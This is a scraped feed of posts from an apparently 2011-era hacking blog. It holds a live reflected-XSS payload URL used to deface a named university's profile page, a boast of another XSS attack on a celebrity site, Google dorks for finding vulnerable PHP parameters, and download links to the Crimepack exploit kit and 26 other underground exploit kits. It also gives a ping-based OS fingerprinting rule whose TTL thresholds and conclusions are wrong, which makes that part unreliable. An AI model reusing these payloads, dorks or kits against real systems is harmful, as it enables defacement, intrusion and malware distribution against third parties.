Finally click on the <span style="font-weight: bold; ">Create Key</span> button and then on the <span style="font-weight: bold; ">OK</span> button<br /><br /><img alt="" border="0" id="BLOGGER_PHOTO_ID_5606624315526696642" src="http://2.bp.blogspot.com/-Gy6nEncd6B0/Tc67HBwJTsI/AAAAAAAAFO0/guEBvv-oY98/s400/predator_lock%2B2.JPG" style="max-width: 99%; padding-top: 6px; padding-right: 6px; padding-bottom: 6px; padding-left: 6px; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(228, 226, 226); border-right-color: rgb(228, 226, 226); border-bottom-color: rgb(228, 226, 226); border-left-color: rgb(228, 226, 226); margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; display: block; height: 358px; text-align: center; width: 400px; background-position: initial initial; background-repeat: initial initial; " /><br /><br />After this the software will automatically exit. Now restart the program by clicking the icon on the desktop.<br /><br />Predator will take a few seconds to initialize. 
Once the icon in the taskbar turns green then your software has initialized itself.</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-40226051963687670942011-07-03T10:08:00.000-07:002011-07-03T10:20:12.380-07:00How to know that web server is Windows or Linux Based<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2TKWpCO-ogPNmmDGprhQqFYAoZ9hn8XsdBVDVzz7K2t3fjLpggXtyqZnsRzXUTf7EikU2SGhggKpaOPOfZsFsPWM8KjuUXB9c9CQarknXXkVsvH5f6bUgJpUavo7NaqyhHm_lYAferk1D/s1600/ping.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 400px; height: 204px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2TKWpCO-ogPNmmDGprhQqFYAoZ9hn8XsdBVDVzz7K2t3fjLpggXtyqZnsRzXUTf7EikU2SGhggKpaOPOfZsFsPWM8KjuUXB9c9CQarknXXkVsvH5f6bUgJpUavo7NaqyhHm_lYAferk1D/s400/ping.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5625175341731885122" /></a><br /><div><br /></div><div><br /></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><br /></i></i></span></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><br /></i></i></span></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><br /></i></i></span></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: 
none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><br /></i></i></span></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3OxcuUeKdB1sl1Jhx88Ep_NjuktLL4NV9nooGrvv4_GJuc2KqzJIyH1pcXPAIOHefpipeWnchd45VS6q7OIVjgqJTO1bLcZpq2LhMBYQA1wtfeby0gi_mmTt2wb8w9VkVVQ4ANueHgYb9/s1600/ping.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}">1) Go to Run -> type CMD</a></b></i></i></span></span></div><div><span 
class="Apple-style-span"><span class="Apple-style-span" ><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;"><b><i><br /></i></b></span></span><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><b><i>In CMD, type</i></b></i><br /></span><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><b><i>ping Target_Website_Name</i></b></i><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; ">. For example: ping facebook.com<br /></i></span><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i>Now you will see several ping requests coming in.</i></span></div><div><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><div class="wp-caption aligncenter" id="attachment_811" style="width: 479px; display: inline !important; "><div class="wp-caption-text" style="display: inline !important; ">Ping Google Server</div></div></i></span><div></div><div><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><b><i>We are interested in the TTL value, which you can see at the end of each request in the ping output.</i></b></i><br /><i><b><i>NOTE: </i></b></i><br /><i><b><i>1) If TTL < 64, the server is Linux based</i></b></i><br /><i><b><i>2) If TTL > 64 but < 128, the server is Windows based</i></b></i><br /><i><b><i>3) TTL > 128: Mac and others.</i></b></i></span></div></div><div><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><b><i>From the above screenshot, it is clear that the servers of 
Facebook are </i></b></i></span><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><b><i>Mac and others</i></b></i></span></div><div><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><b><i><br /></i></b></i></span></div><div><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><i>Note: In some cases you may not get ping replies (e.g. when you try it on your friend’s PC). This can have two reasons: the server is down, i.e. the machine is not connected to the internet, or, the most common reason, a firewall is protecting that PC and is not allowing your request to reach that system.</i></i></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-34481173278988533362011-06-24T13:19:00.000-07:002011-06-24T13:23:16.516-07:00Official Tom Cruise Website Site XSS Attack by Hitcher<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVZ6VkXzq39y-SlU3XJcy9UVw0nsdkzvy-fwP5hxAwcPci1xTTjGfaalOn0LLYlLwPJRy7AoIS89icbHsmtQVmJ9KmCmsmIKNIM4JWLvedHpnRsLqHAt6Xcgxqo2MFY285VZ7M06Oygosf/s1600/Tomcruise.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 225px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVZ6VkXzq39y-SlU3XJcy9UVw0nsdkzvy-fwP5hxAwcPci1xTTjGfaalOn0LLYlLwPJRy7AoIS89icbHsmtQVmJ9KmCmsmIKNIM4JWLvedHpnRsLqHAt6Xcgxqo2MFY285VZ7M06Oygosf/s400/Tomcruise.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5621884178731295122" /></a><br /><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span><div><span 
class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" ><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; ">Official Tom Cruise Website Site XSS Attack by Hitcher </span><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; ">Here's the link: <a href="http://bit.ly/kqnwrH" rel="nofollow" target="_blank" style="cursor: pointer; color: rgb(59, 89, 152); text-decoration: none; ">http://bit.ly/kqnwrH</a></span></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-79395560147134605892011-06-18T13:25:00.001-07:002011-06-18T13:28:03.217-07:00Ctrl+C is unsafe on Internet Explorer<div><br /></div><div>Ctrl+C may be the most important thing we do every day, but it is not a very safe thing to do. Read on to know why. What happens when you press Ctrl+C while you are online? We copy various data with Ctrl+C to paste elsewhere.</div><div><br /></div><div>This copied data is stored in the clipboard and is accessible from the net through a combination of JavaScript and ASP.</div><div><br /></div><div>Just try this:</div><div>Note: this works only when you are using Internet Explorer.</div><div><br /></div><div>1) Copy any text with Ctrl+C</div><div>2) Click the link: <a href="http://www.sourcecodesworld.com/special/clipboard.asp">http://www.sourcecodesworld.com/special/clipboard.asp</a></div><div><br /></div><div>3) You will see that the text you copied was accessed by this web page.</div><div><br /></div><div>Do not keep sensitive data (like passwords, credit card numbers, PINs, etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information.</div><div><br /></div><div>SAVE YOURSELF FROM ONLINE FRAUDS!!!!</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-82870638861241335812011-06-04T06:45:00.000-07:002011-06-04T06:57:45.007-07:00XSS Scanner 1.0<div><br /></div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE4CJnr-qw4dE6FkinIb8Arl-_RFED0OR9puYIu52xWl7IUxKfVW_OWjCI3IqHjmzqdBDdtZYawwTjB-VKZuuRXJ1Vn7Za3yw7mgSUaUzgOqwRMgijzvCYX2-0wRkdL3m4ntRrH16l8Lv8/s1600/copy44jf7.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 321px;" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE4CJnr-qw4dE6FkinIb8Arl-_RFED0OR9puYIu52xWl7IUxKfVW_OWjCI3IqHjmzqdBDdtZYawwTjB-VKZuuRXJ1Vn7Za3yw7mgSUaUzgOqwRMgijzvCYX2-0wRkdL3m4ntRrH16l8Lv8/s400/copy44jf7.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5614362031788181266" /></a><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVLetNpMWmQclHtTLOf8ZH0blP6GslKV4Uiq9Sqky8Uq-sZD0mUtuWdjmqNRGzvmGgWpGPzJCe1z_FPHgxuQy7tRVngWsuls4IEQn0dAehYoHT8KP7lATJbs9ysBakS1STc0EqvdI3w0xI/s400/cheatdbiz5.png" style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 319px;" border="0" alt="" id="BLOGGER_PHOTO_ID_5614362206558370386" /> <div><br /></div><div><span class="Apple-style-span" ><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">20 dork examples:</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?cmd="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?z="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?q="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?search="</span></span><br /><span 
class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?query="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?searchstring="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?keyword="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?file="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?years="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?txt="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?tag="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?max="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?from="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?author="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?pass="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?feedback="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?mail="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?cat="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?vote="</span></span><br /><br /><br /><span class="Apple-style-span"><span 
class="Apple-style-span" style="line-height: 20px; ">| Generic | .biz | .com | .info | .name | .net | .org | .pro | |</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">+-----------------+--------+--------+--------+--------+--------+--------+--------+--------+-------+--------+---------+-------+---------+</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">| Sponsored | .aero | .asia | .cat | .coop | .edu | .gov | .int | .jobs | .mil | .mobi | .museum | .tel | .travel |</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; "> Download link click <a href="http://www.multiupload.com/Q38RJND445"><span class="Apple-style-span">here </span></a></span></span></span></div>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-8876165229323819727.post-83751817555825064422011-06-04T06:03:00.000-07:002011-06-04T06:12:23.317-07:00XSS Attack On Website Of Ghulam Ishaq Khan Institute of Engineering Sciences and Technology by Hitcher<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisTESCa2MwvAqnFsQqQO8yHO5hyLEHpabWfbIXIPDl7VvkyX9zXllPxfCybNplJQTayYPiOwwlIgzFry3cfgTVZL1Inp1RZYoqHT_QCTenHaPQ7jFJ8B-Zd8tQ9AEl_hePINfINOPrq5LA/s1600/xssattackongiki.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 206px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisTESCa2MwvAqnFsQqQO8yHO5hyLEHpabWfbIXIPDl7VvkyX9zXllPxfCybNplJQTayYPiOwwlIgzFry3cfgTVZL1Inp1RZYoqHT_QCTenHaPQ7jFJ8B-Zd8tQ9AEl_hePINfINOPrq5LA/s400/xssattackongiki.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5614351113673778706" /></a><br /><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOJNcM4wIMJNQJO3x3_8dltrt_SS8LQUmBkg-iWj3tQNr2-PPDmbtziSPAXGoR4pBqqHUQ1db8Rflwc4mEKCtchWWicGBdlkm3VBO-JKu8Ai9jcnj8UMJU5Ce1hqC-W0GoNkrpzkrxFnUJ/s1600/giki+xxs+attacked.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><br /></a><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>.........................................For the Hacked Page Link Click <a href="http://www.giki.edu.pk/controlpanel/EditProfile.php?un='%22--%3E%3C/style%3E%3C/script%3E%3Cimg%20src=%22http://img102.herosh.com/2011/06/02/54297568.png%22%20alt=%22some_text%22/%3E%3Ch1%3Ehitcher%20is%20here%20%3Ch/1%3E%3Cscript%3Ealert(0x00342A)%3C/script%3E">Here</a> </div>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-8876165229323819727.post-90792843560932519602011-05-14T07:18:00.000-07:002011-05-14T07:19:45.637-07:00Online malware scanning engine<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihRSH3INyn0DAljpAENGXK2W9DAebgQTkY3jeX348Ny-EjMIRMA5F2EXvPqjkMucthHrU6PJ_25elrUAS2xcMsyY1Tjg5gCJpyYgAPRBwmk1a3MDXQep_erJp_BUMKkaggUd29AvtRlyJy/s1600/Malware+Analyser.png"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 348px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihRSH3INyn0DAljpAENGXK2W9DAebgQTkY3jeX348Ny-EjMIRMA5F2EXvPqjkMucthHrU6PJ_25elrUAS2xcMsyY1Tjg5gCJpyYgAPRBwmk1a3MDXQep_erJp_BUMKkaggUd29AvtRlyJy/s400/Malware+Analyser.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5606576294375687106" /></a><br />Qualys and Malware Analyser (Author : Beenu Arora), recently came into an agreement which will allow Qualys to use Malware Analyser tool on its online malware scanning engine. 
This would enable users to perform more comprehensive scans on malicious executables.<br /><br />According to sources, the author shared the tool's source code only after signing an NDA with the firm.<br /><br />Qualys® (www.qualys.com), headquartered in Redwood Shores, is the leading provider of on-demand IT security risk and compliance management solutions, delivered as a service.<br /><br />Malware Analyser is a freeware tool, written in Python, for analysing malware. The tool was initially open source, back in 2009, but in 2010-11 the author made significant improvements to its core engine, which has made it one of the best static analysis tools.<br /><br />The tool can perform static and dynamic analysis, and the author intends to include process analysis too in the future.<br /><br />The tool can be downloaded from <a href="http://www.malwareanalyser.com/home/">www.malwareanalyser.com </a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-52692674839255196402011-05-14T03:20:00.000-07:002011-05-14T03:22:16.384-07:00Crimepack 3.1.3 Exploit kit<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie0uzYD_rMvefaLf-evZAO3z5hqp9kkDGC9iT6VYtaCndZkdthk6CxT9lhWryMfnwTXLn5M0h8IJhGu7UXa1cKEsCMsUK6ZJDrM2RS6wuBE2tcBCAfWdN2FUoEqP-h3-opMkCJHfBAfzdR/s1600/crimpack-webstart2.png"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 298px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie0uzYD_rMvefaLf-evZAO3z5hqp9kkDGC9iT6VYtaCndZkdthk6CxT9lhWryMfnwTXLn5M0h8IJhGu7UXa1cKEsCMsUK6ZJDrM2RS6wuBE2tcBCAfWdN2FUoEqP-h3-opMkCJHfBAfzdR/s400/crimpack-webstart2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5606514956653232514" /></a><br /><br />Download Here : <a 
href="http://www.multiupload.com/3HGKHWMRS5">http://www.multiupload.com/3HGKHWMRS5</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-5349954357587498882011-05-14T03:13:00.000-07:002011-05-14T03:16:01.979-07:0026 Underground Hacking Exploit KitList of Hacking Exploit Kits :<br /><br />Unknow<br />Tor<br />Target-Exploit<br />Smart pack<br />RDS<br />My poly sploit<br />multisploit<br />mypack-009<br />mypack-091<br />mypack-086<br />mypack-081<br />Mpack<br />Infector<br />Ice-pack-1<br />Ice-pack-2<br />Ice-pack-3<br />G-pack<br />Fire pack -1<br />Fire Pack -2<br />Fiesta -1<br />Fiesta -2<br />Cry 217<br />Armitage<br />Adpack -1<br />Adpack -2<br />0x88<br /><br />Download : <a href="http://www.multiupload.com/EFDCHHZ9ZD">http://www.multiupload.com/EFDCHHZ9ZD</a>Unknownnoreply@blogger.com0